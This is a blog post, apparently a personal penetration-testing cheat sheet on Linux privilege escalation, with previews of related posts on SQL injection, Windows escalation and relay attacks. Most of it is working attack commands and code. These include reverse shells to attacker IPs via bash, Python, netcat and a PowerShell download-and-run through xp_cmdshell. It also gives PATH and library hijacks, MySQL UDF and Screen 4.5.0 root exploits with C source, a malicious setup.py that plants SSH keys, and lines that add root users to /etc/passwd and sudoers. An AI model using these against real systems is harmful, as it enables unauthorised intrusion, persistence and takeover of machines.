Skip to main content

Privilege Escalation

By

Priv Esc Links:


 1) https://gtfobins.github.io/ useful, privesc/jail-escape tasks

 2) Priv Esc Tech Explained Explained 2 Techniques Commands Priv Esc Techniques

3) Linux Restricted Shell Bypass Guide

Things to Check first for Linux Priv Esc


1.   sudo -l 

2.   sudo su

3.   uname -a                   /version --> check for vuln

4.   check for files with root priv

5.   check for cron jobs

6.   /etc/passwd file --> writable ?

7.   #PATH exploit

8.   check for process with root

9.   run pspy to check for running processes & cron jobs

10. Check .bash_history

11. ls -la the home directory

12. Check /opt/, /var/www/html, /home/, /root, / ,  directories thoroughly 

13. Check for World Readable files

14. Check if mysql is running as root. 

15. "mount" command to check for permissions on folders/processes 

16. Run "pspy -f"  on the target and check for all running file system tasks

17. Check for file/folder permissions, even u dont own the file, folder might be owned by you, where you can add/delete files/filenames.

Ex: File is running as Root; folder owner is you.; delete the file and create a new file with the same name. you can get root access. 




Binary PrivEsc:

file binary

strings binary 

cat binary

ls -la binary

Check the file to see if its executing any commands. 

Check for the file paths; 

If the command is cat instead of /bin/cat --> path injection might be possible 

decrease the size of terminal and check for changes

less binary

./binary | less   //Try Getting an Interactive shell with less
      //Then !Command to execute the command, it might only work with a definite screen size

./binary anycommand && /bin/bash 
sudo -l            --> Check for root priv directories and applications
sudo -u USERNAME /PATH/PROGRAM.sh shell.sh
sudo bash                --> Get Root Shell
id                --> get the user privilegs

When id is not installed use this script

awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
Check Version and Distribution

uname -a   cat /proc/versioncat /etc/issue
cat /etc/lsb-release 
sudo id                    --> Check Privilege level
ps aux | grep root             --> check for Applications running with root
netstat -tulpn                   --> see all connections, local and foreign

netstat -a                    --> find all listening ports

When netstat is not installed use this netstat without netstat -  awk script
python -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'


 --> spwan a python shell; sometimes python3 works as well
Get Interactive Shell:

python -c 'import pty;pty.spawn("/bin/bash")'
ctrl +Z 
stty raw -echo
fg
export TERM=xterm 
Grep Recursively for a string   

grep -iRI 'password'

#Grep for a user/string 
grep bhanu /etc -R 2>/dev/null
Port Scanning using nc

echo "" | nc -nvw2 [targetIP] [port-range]

echo "" | nc -nvw2 10.10.10.10 20-100
Finding Files with Root Privileges: 

find / -perm -4000 2>/dev/null | xargs ls -la

Finding World Readable Files:
find / -perm -2 ! -type l -ls 2>/dev/null

World Writable & Executable files
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

World Executable Folders:
find / -perm -o x -type d 2>/dev/null

Find SUID & SGID  Binaries:
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done 

find / -perm -1000 -type d 2>/dev/null     #Only the owner of the directory or the owner of a file can delete or rename here.

find / -perm -g=s -type f 2>/dev/null      #SGID (chmod 2000) - run as the group, not the user who started it.

find / -perm -u=s -type f 2>/dev/null      #SUID (chmod 4000) - run as the owner, not the user who started it.
List the Capabilities of files  which has Root Privileges

getcap -r / 2>/dev/null 

#List all Capabilities 
capsh --print
Find Services Running Behind Firewall/Localhost 

netstat -ano

netstat -tulpn

netstat -pantu | grep LIST    #View listening ports 
Try Sudo inject 
https://github.com/nongiach/sudo_inject  
CRON Jobs 

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root 
Ping Sweep

for i in {1..254} ;do (ping -c 1 10.10.10.$i | grep "bytes from" &) ;done 
find . -type f -ls         --> /Find files in all directories 
lsof -l                  --> View Running Processes 
echo os.system("/bin/bash")       --> Escaping Limited Shell using ssh 
  
gcc exploit.c -pthread -lcrypt -o Exploit  --> Compile The Exploit

gcc -m32 -Wl,--hash-style=both 9542.c -o exploit  

./Exploit 
cat .bash_history   -->  Check the Commands History
sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/ -o allow_other  --> Mount a share folder in your kali machine
 
 df -h                --> Get List of Machine Partitions (Mounted Devices as well)  
/dev/shm            --> World writable directory 
cat /dev/sdb               --> Might contain deleted data in the partition
                               can try strings /dev/sdb for flags
python -m SimpleHTTPServer 8080  --> Start a communication server on your system

wget http://yourip/LinuxEnum.sh  --> Run this in target machine to get this file
Send a File From Kali To Victim

nc -nlvp 9001 < exploit.c  --> Transfer files from Kali 

nc YourIpAddress 8001 > /tmp/exploit.c  --> Get the file On Target Machine

Get a File From Victim to Kali

on Kali: nc -l -p 8001 > filefoldername

on victim: nc -w 5 10.10.14.14 8001 < /usr/local/bin/filename 
Adding a Route to a different network which is accessible

#sudo ip route add CIDR dev Interface
sudo ip route add 10.10.0.0/24 dev tun2 
When anything can only be run as a specific user:

sudo -u UserName /bin/bash             /works when you see this in sudo -l       
Getting Root using PATH INJECTION:

This can be done for relative paths only (my-program) 
which is actually in /bin/my-programs, but shown as my-program in process list.

This can be exploited by 

1) In process list --> full path should not be specified, relative path should be shown

2) check when my-program is running, what is causing it to run and make it run.

3) Check the original location by "which my-program" command.

          /bin/my-program

4) For this exploit to work you should have write access to any relative folders like 
   /usr/local/bin; if /usr/local/bin is before /bin, we should be able to exploit this

         echo $PATH       //get the path info
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
This is mandatory for this to work, because my-program first checks for 
/usr/local/bin directory as its first on the list and if the file "my-program"
is available in the first directory itself - its gonna stop searching furthur. 
5) now go to "cd /usr/local/bin" create a file with the same name as the program

        vi my-program

6) add a reverse shell in the my-program and make it run from external force which 
   can get you root shell. dont forget to chmod +x my-program
Priv Esc using Path Injection 

this technique can be used when an absolute path is not defined for an executable in any script or sercice

cd /tmp
echo 'bash -i >& /dev/tcp/10.10.10.10/9002 0>&1' >gzip
echo  'chmod u+s /bin/bash' > suid
chmod +x gzip
export PATH=/tmp:$PATH

#execute the script as root which is using gzip(example) in it. 
sudo /opt/script.sh

#SUID permission should look like
#-rwsr-xr-x 1 root root 1113504 Jun  6  2019 /bin/bash

#for suid permissions run
/bin/bash  -p
Exploiting the Binary's Path Used in a Binary


for example in a binary /usr/local/bin/devil  (Has ROOT Privs) - there is a command which uses "cat" and 
calling a file from /home/freak ;  

cd /home/freak/

echo "/bin/sh" > cat 
export PATH=/home/freak:/freak:$PATH
/usr/local/bin/devil                 /GET ROOT 
Decode Binary to ASCII for Orchid CMS 

perl -lpe '$_=pack"B*",$_' < <( echo 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001 )
Dumping Data from Mysql

mysqldump -uUserNAME -pP@$$w0rd DB_NAME 

Getting Root Using Mysql; When mysql is running as root -- Priv Esc


locate udf             ///usr/lib/lib_mysqludf_sys.so --> this is essential for this exploit to work.

mysql -u root -p 
select sys_exec('usermod -a -G admin john')   //Giving root privileges

ctrl + C 

sudo su    //enter user password .. you are root now 


Method II:
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

select sys_exec('chmod u+s /bin/bash');

ctrl + c 

bash -p

Reference - Windows & Linux


Method - III -> Mysql 4.x - 5.x

searchsploit -m exploits/linux/local/1518.c

on Target Machine: 

cd /tmp
wget http://192.168.0.2/1518.c

cp 1518.c raptor_udf2.c
gcc -g -c raptor_udf2.c

gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc


mysql -u root -p


use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/raptor_udf2.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
//If this doesnt work try this --> 
                  select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

select * from mysql.func;

select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');

\! sh

cat /tmp/out

exit
exit 

cd /tmp 

vi getroot.c     //add the below content to this 

int main()
{
 setresuid(0, 0, 0);
    setresgid(0, 0, 0);
    system("/bin/bash");
    return 0;
}
mysql -u root -p 
select * from mysql.func;

//Creating a SUID Binary

select do_system('gcc -o /tmp/getroot /tmp/getroot.c');

select do_system('chmod u+s /tmp/getroot');

exit 
exit 
cd /tmp
./getroot
 

For Windows Follow This --> Github Exploit  Video Tutorial 
Cracking mysql Hashes

mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;

#sample hash
$1$llol$srpNQb9srgHAqNAes0FGC1

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt 
Postgresql Is Running As Root

psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr  //Enter Password later 

\dt    \\List Tables
\dp     \\Get DB privileges
select * from table_name; \\ Check Home Directory (just in case) 

Example to Update a value in all rows:
update table_name set gid=0 where gid=1001; \Giving Root Privs

or 
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');


Priv Esc When CAT is being used in system() function"

when an executable file is running cat in a system("cat /home/bhanu/root.txt"),
we can create a new path variable to our required directory, which results in
loading the last set path first and checks for the executable first in the last set 
directory. 

echo $PATH
//      /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

echo "/bin/bash" > cat

chmod 777 cat 

export PATH=/home/bhanu

echo $PATH
//      /home/bhanu

./file_to_run           /This file has the system() function with cat

#You get a new shell :) but as we deleted all the path variables - nothing will work,

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin   
Port Scanning with NMAP:

for ip in $(seq 1 65535); do nc -nvzw1 VICTIM_IP $p 2>&1; done | grep open
Port Forwarding using SoCat:

Start a socat listener on Victim_macine2 - Port 8009 & 8080, and listen it on First compromisted machine.

From Victim-1 machine: do a port scan as above and port forrward the required ports
/Binding the VICTIM-2 ports to Victim-1 Machine so,that we can access it from our Kali machine
socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &  
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 & 

netstart -plunt    /View the binded ports, we can see 8009 & 8080 in Victim_machine1


Access the Victim-2 Ports on our Kali Machine:on Victim-1 Machine: 
socat tcp-listen:4321,fork tcp:KALI_IP:4321 & 


Priv Esc When NMAP Is running as root

/usr/local/bin/nmap  --interactive

!sh 
Priv Esc When wget is running as root

Copy the /etc/passwd from the target machine 

On KALI: 

paste the /etc/passwd from the target and add this line at the end.

bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash

on Target:

sudo wget -O /etc/passwd http://10.10.14.13/passwd
 
su bhanu
password
Priv Esc When Find is Running as root 
find /home -exec sh -i \;
Priv Esc when "Perl"  is running as root

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Priv Esc When "PWD" is being used in a Binary

export PWD=\$\(/bin/bash\)            //In the same directory as of the binary 
Priv Esc with Spice Ports

netstat -anlp | grep LIST

127.0.0.15900 
127.0.0.15901 
127.0.0.15902               //are running 

ps -ef | grep 5900         // shows what it is --> spice Port; libvert+

On Kali:

remote-viewer           // apt install virt-viewer

proxychains remote-viewer spice://127.0.0.1:5900

proxychains remote-viewer spice://127.0.0.1:5901

proxychains remote-viewer spice://127.0.0.1:5902

when VNC opens --> send key --> ctrl+alt+del --> system reboots

interrupt the process --> press e 

go to last but one line --> change "ro" to rw init=/bin/sh

passwd              //change the password
sync
Priv Esc when you have snmpd.conf - rwcommunity string

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD 10.10.10.10 
‘nsExtendStatus.”evilcommand”‘ = createAndGo 
‘nsExtendCommand.”evilcommand”‘ = /usr/bin/python3 
‘nsExtendArgs.”evilcommand”‘ = ‘-c “import 
sys,socket,os,pty;s=socket.socket();s.connect((\”KALI_IP\”,PORT));[os.dup2(s.fileno(),fd)
 for fd in (0,1,2)];pty.spawn(\”/bin/sh\”)”‘ 
Priv Esc/Enum when 121111 is running 

telnet 127.0.0.1 11211
stats cachedump 1 0
get name1
get name2
Priv Esc When /etc/passwd is World Writable

openssl passwd -1 -salt freak password 
      --> used to generate salted password for /etc/passwd file; 
freak = salt 
password = password

$1$freak$/IWD8R6aL2zyhUZPUeAXm. --> Hashed Password

username: Salted Value of username and password:0:0::root:/root:/bin/bash 
                --> create a new account with Root privileges 

echo 'bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash' >>/etc/passwd
            --> add this entry to /bin/passwd to get root access
su bhanu password: password 
Priv Esc Using Python Library Hijacking 

Rastalab - Python Library Hijacking 

# go to the location of hte python scipt that you are trying to hyjack - 
#which is running as a root or any required user 

python -c 'import sys; print "\n".join(sys.path)'

#select a library, ex: shutil; go to a writable directory
mkdir fakelib
cd fakelib
nano shutil.py

import os

def make_archive(a, b, c):
 os.system("nc 10.10.10.10 9001 -e '/bin/sh'")


#exit 
#for example; if you can run root_script.sh as root without pass and it uses some python script 
sudo PYTHONPATH=~/fakelib /opt/scripts/root_script.sh
Priv Esc When Sysinfo is running as root

mkdir /tmp/hack
cd /tmp/hack

nano lshw    or fdisk   or anyother command that is executed when you run sysinfo

#Add a reverse shell in the file 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

chmod +x filename 

#add the folder to path, so that when sysinfo runs - it checks the path first

export PATH=/tmp/filename:$PATH

sysinfo
Priv Esc When /bin/bash or /bin/sh is SUID 
/bin/bash -p             / -p == runs without changing privs  
/bin/sh -p              / -p == runs without changing privs 
Priv Esc for Sudo 1.8.27 -- (ALL, !root) /bin/bash

sudo -u#-1 /bin/bash
Priv Esc When luvit can be run without Password 

sudo -u USERNAME /home/sysadmin/luvit -e 'os.execute("/bin/bash")' 
Priv Esc when a User is running in Docker

https://gtfobins.github.io/gtfobins/docker/

docker images

docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
 
Priv Esc when Snapd (< 2.37.1 is running

snap version               //Check for version - anything before 2.37.1 is vulnerable

Use this exploit          // Creates a new account 


su dirty_sock            //password: dirty_sock


snap changes            //See changes - if sudo doesnt work



Priv Esc When Screen 4.5.0 is running as Root

https://www.exploit-db.com/exploits/41154 

save the below content into rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

gcc -o /tmp/rootshell /tmp/rootshell.c   //Compile it


save the below content into libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c   //Compile it


copy both the executable into /tmp directory in the target machine ..

Follow the below commands:

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
screen -ls
/tmp/rootshell 
When Wildcard is used in Sudo 

sudo -l 

//Wildcard example --> /home/*/*/file.txt (This case is vulnerable)
/var/www/*/*/file.txt

dpkg -l sudo             //1.8.16 sudo is vulnerable 

searchsploit sudoedit

searchsploit -m linux/local/37710.txt

Exploitation:

mkdir folder1
cd folder1
mkdir folder2
cd folder2
ln -s /home/username/.ssh/authorized_keys file.html      //Create a symbolic link 

sudoedit -u username /var/www/folder1/folder2/file.html  //add id-rsa.pub here 

OR

sudoedit -u username /var/www/ .ssh/authorized_keys /file.html    //text editor will open the text as 2 files, where .ssh/authorized_keys can be edited

On Kali: ssh-keygen   //Copy the id_rsa.pub to authorized_keys which is file.html

ssh -i id_rsa username@IP_ADDRESS 
Priv Esc with Ldapseach 

Might be useful --> Ldapsearch usage by Digital Ocean

cd /home/user/
cat ~/.ldaprc       # if you read/see this file - you can authenticate

#Enumerate Users
ldapsearch -x -LLL -w P@SSWORD!    

ldap can be used to exploit ssh access. if you have permission to ldap - 
you can change the permission of a user and make them root user and allow ssh access

#Select a proper/useful group which has more priv than you ex;root/sudo 
cat /etc/group

#Create a SSH public and private key 
ssh-keygen -t rsa -f filename

#Select a user from the ldapseach results --> save the below into bhanu.idi
#Modify  gidNumber & sshPublicKey

dn: uid=bhanu,ou=users,ou=citrix,ou=servers,dc=steins,dc=local
changetype: modify
replace: homeDirectory
homeDirectory: /root
-
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDF3YcLaP/D6s/u2bpsdAGcazs7sGTiQq9VUqe6i07vNzNeVk64Ua/vAZ7YZ5UTc8879aAOKWIAy9ivh2H6iB2qqAIxD9x+lZE4PsAy9ViFxkVUqzsFZ7fwyeqreDXH/8JB/EqoU2+lV564PvfH4WgUU1w3zgeeQ9NvWQTPHQcvuHYnDMPOntLWmLwQIAQMoEwbsH3Tdc0yfkvtY5j8E1USySyiPt+yYbLQNWuJ0eEPHivlLWphd84fl5kIEVUYHJEvZXRAthrq2b+G/DeIDqps6UVbLQt8vQt2z7ZjtnwZS4xAO2WeBn30hisdKpOov81D4AQBHYo5BeIZlFeH/oEExybph93TRZpQL9RwmMsql84tkvOPfGZrUTCQ7PUTQN03+9GKFyJcdPIQdC5OM3DA+P/eO8jLftVJsenDKk560nbrhCiTTCNhn7rijfMxOTwyTStuZ7rryuP7rYYI+hNv3J5zof8LYf6a8435IUT9foN9KtHTO64502V1BbMqJBM=
-
replace: userPassword
userPassword: P@ssword!
-
replace: gidNumber
gidNumber: 55

#Run ldapmodiy query to change the user's password and gid
ldapmodify -D "cn=currnet_user,dc=steins,dc=local  -w P@SSWORD! -f bhanu.ldi
Priv Esc when Pypi Server is running 

Get the steps from here

mkdir shit
touch setup.py setup.cfg README.md
mkdir shit
cd shit
nano __init__.py

def hello_word():
    print("hello world")

nano ../setup.py

from setuptools import setup

try:
        print('Yo, let me save my ssh key on your machine, so tht ic an login ')
        with open ('/home/low/.ssh/autorized_keys','w+') as f:
                f.writelines('ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCfz8MF+Oae5$

except:
        setup(
        name='Shit_Program',
        packages=['shit'],
        description='Hello world enterprise edition',
        version='0.1',
        url='http://pypi.sneakycorp.htb/shit',
        author='shit',
        author_email='shit@bhanu.notes',
        keywords=['pip','shit','example'])

 

nano ../setup.cfg 
[metadata]
description-file = README.md

cd ..
python3 setup.py sdist
cd dist
export HOME=/tmp/shit
cd ..
nano .pypirc
[distutils]
index-servers = 
        pypi
        shit
[pypi]
username:
password:
[shit]
repository: http://127.0.0.1:5000
username: pypi
password: password

python3 setup.py sdist upload -r shit 
Output: 
running upload
Submitting dist/Shit_Program-0.1.tar.gz to http://127.0.0.1:5000
Server response (200): OK


cat /home/low/.ssh/authorized_keys      #our ssh key 
Priv Esc When Pip is running with no Passwd

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip3 install $TF

Priv Esc for chkrootkit

cd /etc/crontab    //chkrootkit is running 

dpkg -l chkrootkit  // chkrootkit     0.49-4ubuntu1.

searchsploit -m exploits/linux/local/33899.txt

cd /tmp 

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

sudo su   //After the crontab time, run this and get root :) 
PrivEsc When Dbus is Running 
  

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /home/root.txt true 

resource

Escaping Limited Shell via SSH


ssh bhanu@10.10.10.10 -t "/bin/bash"      --> Escaping Limited Shell using ssh

Running Applications using SSH

ssh 10.10.14.37@10.10.10.119 "/usr/sbin/tcpdump -i ens33 -U -s0 -w - 'not port 22'" > network.cap

-s0 = capture everything; -w - = write the data; 'not port 22' = do not capture port 22 traffic 

wireshark -k network.cap               //-k = view the live traffic capture immediately.

ssh 10.10.14.37@10.10.10.119 "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark -k -i -
//View Live Traffic
cmd /c dir \users\administrator     --> to execute in web shell
formurl = -o uploads/revshell.php //10.10.14.3/revshell.php 
           -> uploading a reverse shell from BurpSuite; 
                          - o Destination Source
run the shell using IP/uploads/revshell.php and start a meterpreter 
find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
          --> all files and dir with root access 
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh 
                  --> get a proper shell from a restricted shell

Try all the commands from this link one by one to get a complete shell 
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf 

mysql -u root -p               // logging as a root in mysql 

\! ls -l                       //Execute Commands 
Connecting to SQL Server:

sqsh -S 10.10.10.59 -U username -P passaword

xp_cmdshell 'whoami'            /execute commands

//If xp_commandshell is not turned on --> follow this 

EXEC SP_CONFIGURE 'show advanced options', 1
EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go
xp_cmdshell 'whoami'
go

Getting a Reverse Shell
cp nishang/Shells/Invoke-PowerShellTcp.ps1 .

Add this line at the end of the file & Save it
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.11 -Port 900

python -m SimpleHTTPServer 8001

nc -nvlp 9001

xp_cmdshell "powershell IEX(New-Object Net.webClient).DownloadString('http://10.10.14.11:8001/nishang.ps1')"

we get shell on netcat connection
Finding Passwords from a PCAP file using TCPDUMP:
tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='
Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more